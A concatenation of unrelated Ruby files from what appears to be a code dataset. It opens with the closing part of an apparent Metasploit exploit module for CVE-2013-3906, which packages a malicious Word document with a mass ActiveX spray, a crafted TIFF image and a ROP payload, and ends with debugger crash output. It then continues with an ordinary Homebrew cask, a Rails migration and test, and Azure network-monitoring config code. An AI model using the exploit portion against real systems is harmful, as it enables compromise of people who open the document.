:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart6.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
return last_rid, items
end
#
# Manually create everything manually in the ActiveX directory
#
def init_activex_files(last_rid)
activex = []
0x250.times do |i|
id = (last_rid += 1)
bin = {
:fname => "/word/activeX/activeX#{id.to_s}.bin",
:bin => make_activex_bin
}
xml = {
:fname => "/word/activeX/activeX#{id.to_s}.xml",
:xml => make_activex_xml(id)
}
rels = {
:fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}/control"
activex << {
:id => id,
:bin => bin,
:xml => xml,
:rels => rels,
:content_type => ct,
:type => type
}
end
return last_rid, activex
end
#
# Create a [Content_Types.xml], each node contains these attributes:
# :PartName The path to an ActiveX XML file
# :ContentType The contenttype of the XML file
#
def init_contenttype_xml_file(*items)
overrides = []
items.each do |item|
item.each do |obj|
overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
end
end
{:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
end
#
# Creates the tiff file
#
def init_tiff_file(last_rid)
id = last_rid + 1
tiff_data = {
:id => id,
:fname => "/word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}/image"
}
return id, tiff_data
end
#
# Create the document.xml.rels file
#
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
end
reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
{:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
end
#
# Loads a file
#
def read_file(fname)
buf = ''
::File.open(fname, "rb") do |f|
buf << f.read
end
buf
end
#
# Packages everything to docx
#
def make_docx(path)
print_status("Initializing files...")
last_rid = 0
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
last_rid, tiff_file = init_tiff_file(last_rid)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')
if File.directory?(file)
print_status("Packing directory: #{p}")
zip.add_file(p)
else
# Avoid packing image1.jpeg because we'll load it separately
if file !~ /media\/image1\.jpeg/
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
end
end
end
print_status("Packing ActiveX controls...")
activex.each do |ax|
ax_bin = ax[:bin]
ax_xml = ax[:xml]
ax_rels = ax[:rels]
vprint_status("Packing file: #{ax_bin[:fname]}")
zip.add_file(ax_bin[:fname], ax_bin[:bin])
vprint_status("Packing file: #{ax_xml[:fname]}")
zip.add_file(ax_xml[:fname], ax_xml[:xml])
vprint_status("Packing file: #{ax_rels[:fname]}")
zip.add_file(ax_rels[:fname], ax_rels[:rels])
end
print_status("Packing file: #{ct_xml_file[:fname]}")
zip.add_file(ct_xml_file[:fname], ct_xml_file[:data])
print_status("Packing file: #{tiff_file[:fname]}")
zip.add_file(tiff_file[:fname], tiff_file[:data])
print_status("Packing file: #{doc_xml[:fname]}")
zip.add_file(doc_xml[:fname], doc_xml[:xml])
print_status("Packing file: #{rels_xml[:fname]}")
zip.add_file(rels_xml[:fname], rels_xml[:data])
print_status("Packing file: #{doc_xml_reals_file[:fname]}")
zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
zip.pack
end
def exploit
@rop_payload = get_rop_payload
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
docx = make_docx(path)
file_create(docx)
end
end
=begin
0:000> r
eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0
eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
OGL!GdipCreatePath+0x58:
44023a2a ff5050 call dword ptr [eax+50h] ds:0023:41424344=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0011fd98 437a9681 OGL!GdipCreatePath+0x58
0011fdc8 437b11b0 gfx+0x9681
0011fdf0 422b56e5 gfx+0x111b0
0011fe18 422a99f7 oart!Ordinal3584+0x86
0011fed8 422a9921 oart!Ordinal7649+0x2b2
0011fef0 422a8676 oart!Ordinal7649+0x1dc
001200bc 422a85a8 oart!Ordinal4145+0x199
001200fc 424898c6 oart!Ordinal4145+0xcb
001201bc 42489b56 oart!Ordinal3146+0xb15
001202cc 422a37df oart!Ordinal3146+0xda5
00120330 422a2a73 oart!Ordinal2862+0x14e
00120360 317821a9 oart!Ordinal2458+0x5e
001203bc 31782110 wwlib!GetAllocCounters+0x9bd51
001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8
001207ec 3177caef wwlib!GetAllocCounters+0x96d9a
0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697
001209b0 3175ab83 wwlib!GetAllocCounters+0x96348
001209d4 317569e0 wwlib!GetAllocCounters+0x7472b
00120ad4 317540f5 wwlib!GetAllocCounters+0x70588
00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d
To-do:
Turn the docx packaging into a mixin. Good luck with that.
=end
| 33.410929 | 149 | 0.572111 |
6296723c0d8668292cda41f2e99400e9a1e33ca0 | 2,541 | cask 'wine-devel' do
version '5.6'
sha256 'ef09426f20a47dce654729dd1f737823776883ab61e897b8fe53c3eb5fe8680a'
url "https://dl.winehq.org/wine-builds/macosx/pool/winehq-devel-#{version}.pkg"
appcast 'https://dl.winehq.org/wine-builds/macosx/download.html'
name 'WineHQ-devel'
homepage 'https://wiki.winehq.org/MacOS'
conflicts_with formula: 'wine',
cask: [
'wine-stable',
'wine-staging',
]
depends_on x11: true
pkg "winehq-devel-#{version}.pkg",
choices: [
{
'choiceIdentifier' => 'choice3',
'choiceAttribute' => 'selected',
'attributeSetting' => 1,
},
]
binary "#{appdir}/Wine Devel.app/Contents/Resources/start/bin/appdb"
binary "#{appdir}/Wine Devel.app/Contents/Resources/start/bin/winehelp"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/msiexec"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/notepad"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/regedit"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/regsvr32"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wine"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wine64"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wineboot"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winecfg"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wineconsole"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winedbg"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winefile"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winemine"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winepath"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wineserver"
uninstall pkgutil: [
'org.winehq.wine-devel',
'org.winehq.wine-devel-deps',
'org.winehq.wine-devel-deps64',
'org.winehq.wine-devel32',
'org.winehq.wine-devel64',
],
delete: '/Applications/Wine Devel.app'
caveats <<~EOS
#{token} installs support for running 64 bit applications in Wine, which is considered experimental.
If you do not want 64 bit support, you should download and install the #{token} package manually.
EOS
end
| 45.375 | 104 | 0.639512 |
e2eb33eabebf1c02ab994fc6ebd65832ba52ca42 | 320 | class DeviseCreateUsers < ActiveRecord::Migration
def change
create_table(:users) do |t|
t.string :email, null: false
t.string :name
t.string :first_name
t.string :last_name
t.string :profile_image_url
t.timestamps
end
add_index :users, :email, unique: true
end
end
| 20 | 49 | 0.65625 |
6a72ffaffa1521d4cd6539701cacf74d327eef74 | 1,457 | require "test_helper"
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:kevin)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user:
{ name: "", email: "foo@invalid", password: "foo", password_confirmation: "bar" }
}
assert_template 'users/edit'
assert_select "div.alert", text: "The form contains 4 errors."
end
test "successful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
name = "Foo Bar"
email = "[email protected]"
patch user_path(@user), params: { user:
{ name: name, email: email, password: "", password_confirmation: "" }
}
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
test "successful edit with friendly forwarding" do
get edit_user_path(@user)
assert_not_nil session[:forwarding_url]
log_in_as(@user)
assert_redirected_to edit_user_path(@user)
name = "Foo Bar"
email = "[email protected]"
patch user_path(@user), params: { user:
{ name: name, email: email, password: "", password_confirmation: "" }
}
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
end
| 26.490909 | 87 | 0.664379 |
1128cbca90ea63cfe09f755af5db56f5c751d6de | 52,754 | class Logger
require 'thread'
LOG_DEPTH_INC_RESC = 1 # Depth increase of method scope for rescue
LOG_DEPTH_INC_LOOP = 2 # Depth increase of method scope for loop
def self.log_error(msg, depth=0)
_methodname = getMethodname(depth)
_message = "[#{_methodname}]:#{msg}"
$log.error "[NPMD]:#{_message}"
end
def self.log_info(msg, depth=0)
_methodname = getMethodname(depth)
$log.info "[NPMD]:[#{_methodname}]:#{msg}"
end
def self.log_warn(msg, depth=0)
_methodname = getMethodname(depth)
$log.warn "[NPMD]:[#{_methodname}]:#{msg}"
end
class << self
alias_method :logError, :log_error
alias_method :logInfo, :log_info
alias_method :logWarn, :log_warn
end
private
def self.getMethodname(depth)
_depth = depth > 0 ? depth : 0
begin
caller_locations(2 + _depth, 1)[0].label
rescue
caller_locations(2 + LOG_DEPTH_INC_RESC, 1)[0].label
end
end
def self.loop
LOG_DEPTH_INC_LOOP
end
def self.resc
LOG_DEPTH_INC_RESC
end
end
# Module to parse config received from DSC and generate Agent Configuration
module NPMDConfig
require 'rexml/document'
require 'json'
require 'ipaddr'
require 'socket'
# Need to have method to get the subnetmask
class ::IPAddr
def getNetMaskString
_to_string(@mask_addr)
end
end
# This class holds the methods for creating
# a config understood by NPMD Agent from a hash
class AgentConfigCreator
public
# Variables for tracking errors
@@agent_ip_drops = 0
@@agent_drops = 0
@@network_subnet_drops = 0
@@network_drops = 0
@@rule_subnetpair_drops = 0
@@rule_drops = 0
# Strings utilized in drop summary
DROP_IPS = "Agent IPs"
DROP_AGENTS = "Agents"
DROP_SUBNETS = "Network subnets"
DROP_NETWORKS = "Networks"
DROP_SUBNETPAIRS= "Rule subnetpairs"
DROP_RULES = "Rules"
# Reset error checking
def self.resetErrorCheck
@@agent_ip_drops = 0
@@agent_drops = 0
@@network_subnet_drops = 0
@@network_drops = 0
@@rule_subnetpair_drops = 0
@@rule_drops = 0
end
# Generating the error string
def self.getErrorSummary
_agentIpDrops=""
_agentDrops=""
_networkSNDrops=""
_networkDrops=""
_ruleSNPairDrops=""
_ruleDrops=""
if @@agent_ip_drops != 0
_agentIpDrops = "#{DROP_IPS}=#{@@agent_ip_drops}"
end
if @@agent_drops != 0
_agentDrops= "#{DROP_AGENTS}=#{@@agent_drops}"
end
if @@network_subnet_drops != 0
_networkSNDrops = "#{DROP_SUBNETS}=#{@@network_subnet_drops}"
end
if @@network_drops != 0
_networkDrops = "#{DROP_NETWORKS}=#{@@network_drops}"
end
if @@rule_subnetpair_drops != 0
_ruleSNPairDrops = "#{DROP_SUBNETPAIRS}=#{@@rule_subnetpair_drops}"
end
if @@rule_drops != 0
_ruleDrops = "#{DROP_RULES}=#{@@rule_drops}"
end
_str = _agentIpDrops + " " + _agentDrops + " " +
_networkSNDrops + " " + _networkDrops + " " +
_ruleSNPairDrops + " " + _ruleDrops
end
# Only accessible method
def self.createJsonFromUIConfigHash(configHash)
begin
if configHash == nil
Logger::logError "Config received is NIL"
return nil
end
_subnetInfo = getProcessedSubnetHash(configHash["Subnets"])
_doc = {"Configuration" => {}}
_doc["Configuration"] ["Metadata"] = createMetadataElements(configHash["Metadata"])
_doc["Configuration"] ["Agents"] = createAgentElements(configHash["Agents"], _subnetInfo["Masks"])
_doc["Configuration"] ["Networks"] = createNetworkElements(configHash["Networks"], _subnetInfo["IDs"])
_doc["Configuration"] ["Rules"] = createRuleElements(configHash["Rules"], _subnetInfo["IDs"]) unless !configHash.has_key?("Rules")
_doc["Configuration"] ["EPM"] = createEpmElements(configHash["Epm"]) unless !configHash.has_key?("Epm")
_doc["Configuration"] ["ER"] = createERElements(configHash["ER"]) unless !configHash.has_key?("ER")
_configJson = _doc.to_json
_configJson
rescue StandardError => e
Logger::logError "Got error creating JSON from UI Hash: #{e}", Logger::resc
raise "Got error creating AgentJson: #{e}"
end
end
private
def self.getNetMask(ipaddrObj)
_tempIp = IPAddr.new(ipaddrObj.getNetMaskString)
_tempIp.to_s
end
def self.getProcessedSubnetHash(subnetHash)
_h = Hash.new
_h["Masks"] = Hash.new
_h["IDs"] = Hash.new
begin
subnetHash.each do |key, value|
_tempIp = IPAddr.new(value)
_h["Masks"][key] = getNetMask(_tempIp)
_h["IDs"][key] = value
end
_h
rescue StandardError => e
Logger::logError "Got error while creating subnet hash: #{e}", Logger::resc
nil
end
end
def self.createMetadataElements(metadataHash)
_metadata = Hash.new
_metadata["Version"] = metadataHash.has_key?("Version") ? metadataHash["Version"] : String.new
_metadata["Protocol"] = metadataHash.has_key?("Protocol") ? metadataHash["Protocol"] : String.new
_metadata["SubnetUid"] = metadataHash.has_key?("SubnetUid") ? metadataHash["SubnetUid"] : String.new
_metadata["AgentUid"] = metadataHash.has_key?("AgentUid") ? metadataHash["AgentUid"] : String.new
_metadata[:"WorkspaceResourceId"] = metadataHash["WorkspaceResourceID"] if metadataHash.has_key?("WorkspaceResourceID")
_metadata[:"WorkspaceId"] = metadataHash["WorkspaceID"] if metadataHash.has_key?("WorkspaceID")
_metadata[:"LastUpdated"] = metadataHash["LastUpdated"] if metadataHash.has_key?("LastUpdated")
return _metadata
end
def self.createAgentElements(agentArray, maskHash)
_agents = Array.new
agentArray.each do |x|
_agent = Hash.new
_agent["Name"] = x["Guid"];
_agent["Capabilities"] = x["Capability"].to_s;
_agent["IPConfiguration"] = [];
x["IPs"].each do |ip|
_ipConfig = Hash.new
_ipConfig["IP"] = ip["IP"];
_subnetMask = maskHash[ip["SubnetName"]];
if _subnetMask.nil?
Logger::logWarn "Did not find subnet mask for subnet name #{ip["SubnetName"]} in hash", 2*Logger::loop
@@agent_ip_drops += 1
else
_ipConfig["Mask"] = maskHash[ip["SubnetName"]];
end
_agent["IPConfiguration"].push(_ipConfig);
end
_agents.push(_agent);
if _agents.empty?
@@agent_drops += 1
end
end
_agents
end
def self.createNetworkElements(networkArray, subnetIdHash)
_networks = Array.new
networkArray.each do |x|
_network = Hash.new
_network["Name"] = x["Name"];
_network["Subnet"] = Array.new
x["Subnets"].each do |sn|
_subnet = Hash.new
_subnetId = subnetIdHash[sn]
if _subnetId.nil?
Logger::logWarn "Did not find subnet id for subnet name #{sn} in hash", 2*Logger::loop
@@network_subnet_drops += 1
else
_subnet["ID"] = subnetIdHash[sn];
_subnet["Disabled"] = "False" # TODO
_subnet["Tag"] = "" # TODO
end
_network["Subnet"].push(_subnet);
end
_networks.push(_network);
if _networks.empty?
@@network_drops += 1
end
end
_networks
end
def self.createActOnElements(elemArray, subnetIdHash)
_networkTestMatrix = Array.new
elemArray.each do |a|
_sSubnetId = "*"
_dSubnetId = "*"
if a["SS"] != "*" and a["SS"] != ""
_sSubnetId = subnetIdHash[a["SS"].to_s]
end
if a["DS"] != "*" and a["DS"] != ""
_dSubnetId = subnetIdHash[a["DS"].to_s]
end
if _sSubnetId.nil?
Logger::logWarn "Did not find subnet id for source subnet name #{a["SS"].to_s} in hash", 2*Logger::loop
@@rule_subnetpair_drops += 1
elsif _dSubnetId.nil?
Logger::logWarn "Did not find subnet id for destination subnet name #{a["DS"].to_s} in hash", 2*Logger::loop
@@rule_subnetpair_drops += 1
else
# Process each subnetpair
_snPair = Hash.new
_snPair["SourceSubnet"] = _sSubnetId
_snPair["SourceNetwork"] = a["SN"]
_snPair["DestSubnet"] = _dSubnetId
_snPair["DestNetwork"] = a["DN"]
_networkTestMatrix.push(_snPair);
end
end
_networkTestMatrix
end
def self.createRuleElements(ruleArray, subnetIdHash)
_rules = Array.new
ruleArray.each do |x|
_rule = Hash.new
_rule["Name"] = x["Name"];
_rule["Description"] = x["Description"]
_rule["Protocol"] = x["Protocol"].to_s;
_rule["NetworkTestMatrix"] = createActOnElements(x["Rules"], subnetIdHash);
_rule["AlertConfiguration"] = Hash.new;
_rule["Exceptions"] = createActOnElements(x["Exceptions"], subnetIdHash);
_rule["DiscoverPaths"] = x["DiscoverPaths"].to_s
if _rule["NetworkTestMatrix"].empty?
Logger::logWarn "Skipping rule #{x["Name"]} as network test matrix is empty", Logger::loop
@@rule_drops += 1
else
# Alert Configuration
_rule["AlertConfiguration"]["ChecksFailedPercent"] = x["LossThreshold"].to_s
_rule["AlertConfiguration"]["RoundTripTimeMs"] = x["LatencyThreshold"].to_s
end
if !_rule.empty?
_rules.push(_rule)
end
end
_rules
end
def self.createEpmElements(epmHash)
return if epmHash.nil?
_epmRules = Hash.new
_rule = Array.new
epmHash.each do |key, rules|
for i in 0..rules.length-1
_ruleHash = Hash.new
_iRule = rules[i] # get individual rule
_ruleHash["ID"] = _iRule["ID"]
_ruleHash["Name"] = _iRule["Name"]
_ruleHash["CMResourceId"] = _iRule.has_key?("CMResourceId") ? _iRule["CMResourceId"] : String.new
_ruleHash["IngestionWorkspaceId"] = _iRule.has_key?("IngestionWorkspaceId") ? _iRule["IngestionWorkspaceId"] : String.new
_ruleHash["WorkspaceAlias"] = _iRule.has_key?("WorkspaceAlias") ? _iRule["WorkspaceAlias"] : String.new
_ruleHash["Redirect"] = "false"
_ruleHash["WorkspaceResourceID"] = _iRule["WorkspaceResourceID"];
_ruleHash["DiscoverPaths"] = _iRule.has_key?("DiscoverPaths") ? _iRule["DiscoverPaths"].to_s : "true"
_ruleHash["NetTests"] = (_iRule["NetworkThresholdLoss"].to_i >= -2 and _iRule["NetworkThresholdLatency"].to_i >= -2) ? "true" : "false"
_ruleHash["AppTests"] = (_iRule["AppThresholdLatency"].to_i >= -2) ? "true" : "false"
_ruleHash["ValidStatusCodeRanges"] = _iRule.has_key?("ValidStatusCodeRanges") ? _iRule["ValidStatusCodeRanges"] : nil;
if (_ruleHash["NetTests"] == "true")
_ruleHash["NetworkThreshold"] = {"ChecksFailedPercent" => _iRule["NetworkThresholdLoss"].to_s, "RoundTripTimeMs" => _iRule["NetworkThresholdLatency"].to_s}
end
if (_ruleHash["AppTests"] == "true")
_ruleHash["AppThreshold"] = {"ChecksFailedPercent" => (_iRule.has_key?("AppThresholdLoss") ? _iRule["AppThresholdLoss"].to_s : nil), "RoundTripTimeMs" => _iRule["AppThresholdLatency"].to_s}
end
# Fill endpoints
_epList = _iRule["Endpoints"]
_endpointList = Array.new
for j in 0.._epList.length-1
_epHash = Hash.new
_epHash["Name"] = _epList[j]["Name"]
_epHash["ID"] = _epList[j]["Id"]
_epHash["DestAddress"] = _epList[j]["URL"]
_epHash["DestPort"] = _epList[j]["Port"].to_s
_epHash["TestProtocol"] = _epList[j]["Protocol"]
_epHash["MonitoringInterval"] = _iRule["Poll"].to_s
_epHash["TimeDrift"] = _epList[j]["TimeDrift"].to_s
_endpointList.push(_epHash)
end
_ruleHash["Endpoints"] = _endpointList
_rule.push(_ruleHash)
end
end
_epmRules["Rules"] = _rule
_epmRules
end
def self.createERElements(erHash)
return if erHash.nil?
_er = Hash.new
erHash.each do |key, rules|
# Fill Private Peering Rules
if key == "PrivatePeeringRules"
_ruleList = Array.new
for i in 0..rules.length-1
_pvtRule = Hash.new
_iRule = rules[i]
_pvtRule["Name"] = _iRule["Name"]
_pvtRule["ConnectionResourceId"] = _iRule["ConnectionResourceId"]
_pvtRule["CircuitResourceId"] = _iRule["CircuitResourceId"]
_pvtRule["CircuitName"] = _iRule["CircuitName"]
_pvtRule["VirtualNetworkName"] = _iRule["vNetName"]
_pvtRule["Protocol"] = _iRule["Protocol"].to_s
#Thresholds
_thresholdMap = Hash.new
_thresholdMap["ChecksFailedPercent"] = _iRule["LossThreshold"].to_s
_thresholdMap["RoundTripTimeMs"] = _iRule["LatencyThreshold"].to_s
_pvtRule["AlertConfiguration"] = _thresholdMap
#OnPremAgents
_onPremAgents = Array.new
_onPremAgentList = _iRule["OnPremAgents"]
for j in 0.._onPremAgentList.length-1
_onPremAgents.push(_onPremAgentList[j])
end
_pvtRule["OnPremAgents"] = _onPremAgents
#AzureAgents
_azureAgents = Array.new
_azureAgentsList = _iRule["AzureAgents"]
for k in 0.._azureAgentsList.length-1
_azureAgents.push(_azureAgentsList[k])
end
_pvtRule["AzureAgents"] = _azureAgents
_ruleList.push(_pvtRule)
end
_er[:"PrivateRules"] = _ruleList if !_ruleList.empty?
end
# Fill MS Peering Rules
if key == "MSPeeringRules"
_ruleList = Array.new
for i in 0..rules.length-1
_msRule = Hash.new
_iRule = rules[i]
_msRule["Name"] = _iRule["Name"]
_msRule["CircuitName"] = _iRule["CircuitName"]
_msRule["Protocol"] = _iRule["Protocol"].to_s
_msRule["CircuitResourceId"] = _iRule["CircuitResourceId"]
#Thresholds
_thresholdMap = Hash.new
_thresholdMap["ChecksFailedPercent"] = _iRule["LossThreshold"].to_s
_thresholdMap["RoundTripTimeMs"] = _iRule["LatencyThreshold"].to_s
_msRule["AlertConfiguration"] = _thresholdMap
#OnPremAgents
_onPremAgents = Array.new
_onPremAgentList = _iRule["OnPremAgents"]
for j in 0.._onPremAgentList.length-1
_onPremAgents.push(_onPremAgentList[j])
end
_msRule["OnPremAgents"] = _onPremAgents
#Urls
_urls = Array.new
_urlList = _iRule["UrlList"]
for k in 0.._urlList.length-1
_urlHash = Hash.new
_urlHash["Target"] = _urlList[k]["url"]
_urlHash["Port"] = _urlList[k]["port"].to_s
_urls.push(_urlHash)
end
_msRule["URLs"] = _urls
_ruleList.push(_msRule)
end
_er[:"MSPeeringRules"] = _ruleList if !_ruleList.empty?
end
end
_er
end
end
# This class holds the methods for parsing
# a config sent via DSC into a hash
class UIConfigParser
public
# Only accessible method
def self.parse(string)
begin
_doc = REXML::Document.new(string)
if _doc.elements.empty? or _doc.root.nil?
Logger::logWarn "UI config string converted to nil/empty rexml doc"
return nil
end
_configVersion = _doc.elements[RootConfigTag].attributes[Version].to_i
unless _configVersion == 3
Logger::logWarn "Config version #{_configVersion} is not supported"
return nil
else
Logger::logInfo "Supported version of config #{_configVersion} found"
end
_config = _doc.elements[RootConfigTag + "/" + SolnConfigV3Tag]
if _config.nil? or _config.elements.empty?
Logger::logWarn "found nothing for path #{RootConfigTag}/#{SolnConfigV3Tag} in config string"
return nil
end
@agentData = JSON.parse(_config.elements[AgentInfoTag].text())
@metadata = JSON.parse(_config.elements[MetadataTag].text())
_h = Hash.new
_h[KeyMetadata] = @metadata
_h[KeyNetworks] = getNetworkHashFromJson(_config.elements[NetworkInfoTag].text())
_h[KeySubnets] = getSubnetHashFromJson(_config.elements[SubnetInfoTag].text())
_h[KeyAgents] = getAgentHashFromJson(_config.elements[AgentInfoTag].text())
_h[KeyRules] = getRuleHashFromJson(_config.elements[RuleInfoTag].text()) unless _config.elements[RuleInfoTag].nil?
_h[KeyEpm] = getEpmHashFromJson(_config.elements[EpmInfoTag].text()) unless _config.elements[EpmInfoTag].nil?
_h[KeyER] = getERHashFromJson(_config.elements[ERInfoTag].text()) unless _config.elements[ERInfoTag].nil?
_h = nil if (_h[KeyNetworks].nil? or _h[KeySubnets].nil? or _h[KeyAgents].nil?)
if _h == nil
Logger::logError "UI Config parsed as nil"
end
return _h
rescue REXML::ParseException => e
Logger::logError "Got XML parse exception at #{e.line()}, #{e.position()}", Logger::resc
raise "Got XML parse exception at #{e.line()}, #{e.position()}"
end
nil
end
private
RootConfigTag = "Configuration"
SolnConfigV3Tag = "NetworkMonitoringAgentConfigurationV3"
MetadataTag = "Metadata"
NetworkInfoTag = "NetworkNameToNetworkMap"
SubnetInfoTag = "SubnetIdToSubnetMap"
AgentInfoTag = "AgentFqdnToAgentMap"
RuleInfoTag = "RuleNameToRuleMap"
EpmInfoTag = "EPMConfiguration"
EpmTestInfoTag = "TestIdToTestMap"
EpmCMInfoTag = "ConnectionMonitorIdToInfoMap"
EpmEndpointInfoTag = "EndpointIdToEndpointMap"
EpmAgentInfoTag = "AgentIdToTestIdsMap"
ERInfoTag = "erConfiguration"
ERPrivatePeeringInfoTag = "erPrivateTestIdToERTestMap";
ERMSPeeringInfoTag = "erMSTestIdToERTestMap";
ERCircuitInfoTag = "erCircuitIdToCircuitResourceIdMap";
Version = "Version"
KeyMetadata = "Metadata"
KeyNetworks = "Networks"
KeySubnets = "Subnets"
KeyAgents = "Agents"
KeyRules = "Rules"
KeyEpm = "Epm"
KeyER = "ER"
# Hash of {AgentID => {AgentContract}}
@agentData = {}
# Hash of Metadata
@metadata = {}
def self.getCurrentAgentId()
begin
_agentId = ""
_ips = []
addr_infos = Socket.getifaddrs
addr_infos.each do |addr_info|
if addr_info.addr and (addr_info.addr.ipv4? or addr_info.addr.ipv6?)
_ips.push(addr_info.addr.ip_address)
end
end
@agentData.each do |key, value|
next if value.nil? or !(value["IPs"].is_a?Array)
value["IPs"].each do |ip|
for ipAddr in _ips
if ip["Value"] == ipAddr
_agentId = key
break
end
end
end
end
return _agentId
end
end
def self.getNetworkHashFromJson(text)
begin
_h = JSON.parse(text)
_a = Array.new
_h.each do |key, value|
next if value.nil? or value["Subnets"].nil?
_network = Hash.new
_network["Name"] = key
_network["Subnets"] = value["Subnets"]
_a << _network
end
_a
rescue JSON::ParserError => e
Logger::logError "Error in Json Parse in network data: #{e}", Logger::resc
nil
end
end
def self.getSubnetHashFromJson(text)
begin
_h = JSON.parse(text)
rescue JSON::ParserError => e
Logger::logError "Error in Json Parse in subnet data: #{e}", Logger::resc
nil
end
end
def self.getAgentHashFromJson(text)
begin
_h = JSON.parse(text)
_a = Array.new
_h.each do |key, value|
next if value.nil? or !(value["IPs"].is_a?Array)
_agent = Hash.new
_agent["Guid"] = key
_agent["Capability"] = value["Protocol"] unless value["Protocol"].nil?
_agent["IPs"] = Array.new
value["IPs"].each do |ip|
_tempIp = Hash.new
_tempIp["IP"] = ip["Value"]
# Store agent subnet name as string
_tempIp["SubnetName"] = ip["Subnet"].to_s
_agent["IPs"] << _tempIp
end
_a << _agent
end
_a
rescue JSON::ParserError => e
Logger::logError "Error in Json Parse in agent data: #{e}", Logger::resc
nil
end
end
def self.getRuleHashFromJson(text)
begin
_h = JSON.parse(text)
_a = Array.new
_h.each do |key, value|
next if value.nil? or
!(value["ActOn"].is_a?Array) or
!(value["Exceptions"].is_a?Array)
_rule = Hash.new
_rule["Name"] = key
_rule["LossThreshold"] = (!value["Threshold"].nil? and value["Threshold"].has_key?("Loss")) ? value["Threshold"]["Loss"] : "-2"
_rule["LatencyThreshold"] = (!value["Threshold"].nil? and value["Threshold"].has_key?("Latency")) ? value["Threshold"]["Latency"] : "-2.0"
_rule["Protocol"] = value["Protocol"] unless value["Protocol"].nil?
_rule["Rules"] = value["ActOn"]
_rule["Exceptions"] = value["Exceptions"]
_rule["DiscoverPaths"] = value.has_key?("DiscoverPaths") ? value["DiscoverPaths"].to_s : "true"
_rule["Description"] = value["Description"]
_rule["Enabled"] = value["Enabled"]
_a << _rule
end
_a
rescue JSON::ParserError => e
Logger::logError "Error in Json Parse in rule data: #{e}", Logger::resc
nil
end
end
def self.getEpmHashFromJson(text)
begin
_h = JSON.parse(text)
_agentId = getCurrentAgentId()
if _agentId.empty?
return nil
else
_epmRules = {"Rules" => []}
# Check all tests related to current agent id and push their configurations to current agent
_testIds = _h[EpmAgentInfoTag][_agentId]
return if _testIds.nil?
_testIds.each do |testId|
_test = _h[EpmTestInfoTag][testId]
_rule = Hash.new
_rule["ID"] = testId
_rule["Name"] = _test["Name"]
_rule["Poll"] = _test["Poll"]
_rule["WorkspaceResourceID"] = @metadata.has_key?("WorkspaceResourceID") ? @metadata["WorkspaceResourceID"] : String.new
_rule["DiscoverPaths"] = _test.has_key?("DiscoverPaths") ? _test["DiscoverPaths"].to_s : "true"
_rule["AppThresholdLoss"] = _test["AppThreshold"].nil? ? "-3" : (_test["AppThreshold"].has_key?("Loss") ? _test["AppThreshold"]["Loss"] : "-2")
_rule["AppThresholdLatency"] = _test["AppThreshold"].nil? ? "-3.0" : (_test["AppThreshold"].has_key?("Latency") ? _test["AppThreshold"]["Latency"] : "-2.0")
